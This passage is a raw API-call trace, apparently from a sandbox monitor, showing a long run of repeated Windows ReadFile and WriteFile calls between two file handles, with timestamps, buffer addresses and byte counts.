lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.901] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.901] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.902] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.904] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.905] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x216, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.907] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.908] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.910] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.910] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.911] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.912] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.914] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.915] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.915] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x217, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.917] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.918] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.920] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.922] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.922] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.924] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.925] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.925] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.926] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.927] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.928] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.929] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.930] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x358, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.933] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x368, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.934] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.935] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.936] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.937] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.937] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.939] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.939] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.940] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.941] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.943] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.944] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.945] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.945] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.946] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.947] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.947] ReadFile (in: 